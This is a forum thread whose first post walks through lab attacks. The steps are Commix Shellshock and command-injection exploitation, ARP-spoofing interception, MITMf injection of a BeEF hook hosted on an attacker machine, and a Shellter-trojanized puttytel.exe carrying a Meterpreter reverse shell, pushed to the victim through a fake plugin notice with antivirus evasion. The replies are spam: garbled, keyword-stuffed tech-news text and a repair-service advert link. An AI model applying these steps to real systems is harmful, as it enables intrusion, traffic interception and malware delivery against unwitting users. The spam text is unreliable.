Command and Shell Code Injection Scenarios with Commix and Shellter 2023

Poison_tools

Active member
Member
Joined
Oct 19, 2023
Messages
531
Credits
15,358

Introduction to Command and Shell Code Injection Scenarios with Commix and Shellter:​

This virtual yet realistic scenario was created to demonstrate some exploitation techniques using my favorite tools. We will exploit the web application command injection and Shellshock vulnerability using the Commix tool created by @ancst. In addition, we will use beEF to exploit the web browser and the Shellter project by kyREcon, which is the most advanced PE/Shellcode Injector ever created – yes, you probably haven’t heard of it.

This article was written while enjoying – cappuccino – coffee in Monastiraki, Athens. I tried to make it as technical as possible while still trying to create a funny and informative story. Of course, no one was harmed in Monastiraki during this article. Instead, several virtual machines were created to replace the cafe’s clients. At the end of this article you will find all the configurations and scripts I used available. Make sure to upgrade them!

So by running the three virtual machines I’ve already set up. I continued to discover their IP.

I was able to determine the IP of each virtual machine by running the following command:

$ nmap -sn 192.168.1.0/24

Since the first IP belongs to the router, let’s start exploring the second host with IP 192.168.1.5.

There were no firewalls or IPS/IDS set up so we can do an Aggressive Nmap Scan.

$ sudo nmap -A 192.168.1.5



By accessing the web server we are redirected to: http://192.168.1.5/cgi-bin/notvulnerable.cgi

What is the first thing that comes to mind when we find a CGI file available on a web server? That’s right, Shellshock! To use it, I will use the Commix tool I mentioned earlier. Commix comes with a pre-installed plugin that allows us to perform a Command Injection attack once we find the Shellshock vulnerability.

Of course, we can first manually test if there really is a Shellshock vulnerability, but we don’t have to worry about that because Commix will also notify us. For this specific use of Shellshock, Commix will parse the payload via the User-Agent header.

The command I executed:

$ python commix.py –shellshock –url=”http://192.168.1.5/cgi-bin/notvulnerable.cgi”

And here is the result:

As you can see, we are able to execute commands against the target system. Of course, Commix informed us of the payload used to execute the command.

We can also see what the request looks like from Wireshark. Please see the User-Agent header.

Now we will move to our second virtual machine lab with IP 192.168.1.68. By performing a port scan, we can see that the web server is available. When we view it, we see something like this:

Let’s test it to see how it works. Specifying /var/www/html as the path gives the following result:

Let’s use Commix again to see if a web application is vulnerable to code injection attacks. For the sake of order, as you will see in the application code, I have blacklisted several characters to prevent the code from being inserted. What really caught my eye is that I also blacklisted the “$” character, but Commix still managed to abuse the app.

The command I used:

$ python commix.py –url=”http://192.168.1.68/index.php?command=test”

And the result:

Again you can see the applied load. In this case it was: “%0aecho VZYDSK>/var/www/html/VZYDSK.txt”.

As we have seen, Commix is a powerful Command Injection tool. There are many cases where you can use this and it would be impossible to cover them all in one article. More usage examples can be found here.

Now we move to our final destination host, 192.168.1.109. From the Aggressive scan, we can guess that the target is a simple host with no special services running. We can also see that it runs on Windows 10 distribution.

Assuming that the host is being used by an active user, I performed an ARP Spoof attack to see its activity. The commands I used were:

$ echo 1 > /proc/sys/net/ipv4/ip_forward

$ arpspoof -t 192.168.1.109 192.168.1.1 -i wlan0

And then I used Wireshark to view the web pages the user was browsing. Of course, it can also find out which websites the victim is visiting using tools like urlsnarf. After a while I caught this request:

I have seen HTTP requests to this website www.4stoixeia.gr several times, so I decided to insert a BeEF hook script into the user’s browser.

This task can be achieved in several ways. For the simplicity of this article, I stopped the ARP Spoof attack I started earlier and used MITMf
perform a MITM attack. It is important to run “beef-xss” before running MITMF
script. In the Kali box you can run:

$ beef-xss

Back to MITMF, I also used the –js-url parameter to specify the script I wanted to embed:

$ mitmf –spoof –arp –inject –target=192.168.1.109 –gateway=192.168.1.1 –js-url=”http://192.168.1.111:3000/hook.js” -i eth1

Now when a MITM attack is going on, we have to wait for the victim to reach any web page. After a while my BeEF window looked like this:

However, this is not enough. I wanted to get a reverse shell on the target machine. What I did was select the “Fake Notification Bar” plugin provided by BeEF, which tells the victim to download some important plugins for their browser. The problem was finding a good way to embed my shellcode. There may be a firewall and anti-virus application on the target computer that I didn’t want to point out.

After much research, I found that the most secret way to do this is with a powerful tool called Shellter. Shellter provides a beautiful solution when we need to inject shellcode into Windows applications. As I mentioned before, it is the most advanced PE infector/Shellcode Injector ever created.

First, I used the Meterpreter reverse_tcp payload and loaded it into the Metasploit utility, which I then ran.

I then downloaded puttytel into which I would put my shellcode with Shellter. Of course, you can use any program you want. This is just an example that shows how to insert shellcodes using Shellter. I then ran Shellter using Wine and configured my malicious file:

Here I used automatic operation mode. PE Target is the location of the file where we would like to put our shellcode. For this example it was puttytel.exe.


I also used Stealth Mode here. Additionally, I used the Meterpreter_Reverse_TCP payload and configured it accordingly. Our malicious file is now called “puttytel.exe”. Shellter saved the official file called “puttytel.exe.bak”.

Now that we have a malicious file with an embedded payload, let’s go back to BeEF and run the Fake Notification plugin.

As you can see, we force the victim to download the embedded file. This is what the victim’s screen will look like after running the plugin:

Assuming the victim downloads and runs the “plugin” and thus our embedded program, we’ll see something like this:

What’s really amazing is that the user will see that the program is running normally:

Even with AV enabled, we managed to get a reverse shell.

As you’ve seen, both Commix and Shellter are powerful tools that I really recommend you start using. Of course, you should ONLY use them for educational purposes. You should never use them to damage someone else’s property.

Here are the simple vulnerable apps I created for this article:

Github: Vulnerable Apps
 

MorrissDor

Member
Member
Joined
Jul 21, 2024
Messages
544
Credits
24,961
Vzka Nokia Shares Pop 47% On News Of Microsoft Deal
To enable this, Atlassian built a new video platform based on its acquisition of BlueJimp and that company Videobridge appliance and聽Jitsi WebRTC-based open source video conferencing software. When Atlassian聽acquired stanley termos BlueJimp, it already said stanley canada that it聽did so to聽bring group video chats to HipChat, so today news doesn ;t come as a complete surprise. What聽may be surprising, though, is that Slack doesn ;t offer a similar tool yet.As Atlassian GM of HipChat Steve Goldsmith聽told me, the idea here was to bridge the gap between team chat apps and video conferencing service. Too often, after all, those video services only introduce new layers of complexity聽and friction, which in turn makes it less likely for team members to want to use them let alone set up a spur-of-the-moment video chat .Goldsmith also noted that聽the technical integration of the fea stanley tumbler ture was pretty easy because the team was able to build on years of experience thanks to聽the BlueJimp acquisitio Nrkr SourceLair Lets You Code Right In Your Browser
The update brings with it a brand new Space Egg character, along with the return of Orange Bird, post-Super Hero makeover. Past that, you ;ll also get access to 20 new levels and 10 new bonus levels. And if that weren ;t enough, Rovio has added a new boss fight into the mix fo stanley mugs r serious bird-slingers.Perhaps more interesting than the update is the appearance of a new image on Rovio Facebook page.It shows a pig surrounded by blocks and planks, with three though bubbles for how those pieces of debris could be arranged. The caption reads, decisions, decisions.& 82 stanley thermos 21;Considering the fact that Rovio latest release, Amazing Alex, has its own level editors, many speculate that this may be Rovio teaser for an Angry Birds level editor, in which you could arrange the levels and then bust ;em to pieces.We reached out to Rovio about the level editor teaser, and as we expected, they wouldn ;t comment on rumors. Which they start stanley bottles ed by
 
Joined
Sep 8, 2024
Messages
92
Credits
2,399
Профессиональный сервисный центр по ремонту бытовой техники с выездом на дом.
Мы предлагаем: <a href=https://remont-byttekhniki-moskva.ru>ремонт крупногабаритной техники в москве</a>
Наши мастера оперативно устранят неисправности вашего устройства в сервисе или с выездом на дом!
 
Top